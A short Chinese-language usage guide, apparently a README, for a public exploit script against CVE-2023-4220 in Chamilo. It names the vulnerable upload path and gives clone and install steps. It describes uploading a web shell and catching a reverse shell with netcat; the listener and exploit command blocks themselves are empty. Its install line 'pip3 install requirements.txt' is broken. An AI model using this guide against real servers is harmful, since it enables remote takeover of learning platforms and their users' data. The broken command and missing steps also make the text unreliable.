CVE-2023-4220 是一个文件上传漏洞,影响 Chamilo <= 1.11.24 版本。该漏洞允许攻击者通过上传 webshell 到路径 /main/inc/lib/javascript/bigupload/inc/bigUpload.php(该文件将存储在目录 /main/inc/lib/javascript/bigupload/files 下)来实现远程命令执行。
git clone https://github.com/H4cking4All/CVE-2023-4220.git
cd CVE-2023-4220
pip3 install requirements.txt

该脚本可以在两种模式下运行:checkvuln,仅检查系统是否存在漏洞;exploit,将通过上传 web shell 并发送反向 shell 到攻击者机器来利用漏洞。
首先,使用 netcat 监听:

然后执行 exploit:

这样,我们将收到一个交互式 shell:
